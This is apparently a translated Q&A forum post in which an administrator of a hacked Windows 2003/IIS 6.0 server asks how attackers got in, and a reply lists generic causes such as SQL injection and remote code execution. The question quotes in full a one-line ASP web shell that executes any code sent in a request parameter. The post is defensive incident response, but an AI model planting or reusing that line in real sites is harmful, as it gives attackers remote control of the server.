我的一位客户注意到谷歌搜索结果中有一条消息称他们的网站可能已被黑客入侵。经过一番挖掘,我在服务器上发现了包含seo垃圾和javascript引用的html文件。我删除了这些文件,更改了cms密码,更新了一些组件,如CKFinder等......
然后我开始查看服务器上的其他站点,发现大量的.asp文件包含此行
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
我删除了那些,但不知道他们是如何到达那里的。我查看了各种日志(事件查看器,网站,ftp),但大多数日志都没有回溯到创建文件的时间。
我已经更新了操作系统,这只是一个月或两个过时的时间,并且更改了ftp访问权限。
我还能做些什么来找到入境点或确保我的服务器和网站安全?
BTW:这是运行IIS 6.0的Windows 2003服务器。
答案 0 :(得分:0)
他们可以通过多种方式访问您的服务器。
您是在运行常见的CMS还是自定义? 他们可能在您的某个脚本中发现了漏洞。
例如,如果他们发现SQL注入漏洞,他们可以检索数据库信息。 如果他们在哪里找到RCE错误(远程代码执行),他们可能已经能够执行系统命令,从而导致创建这些任意文件。除此之外,本周已修补的Windows服务器中存在一些漏洞,请查看此链接: http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html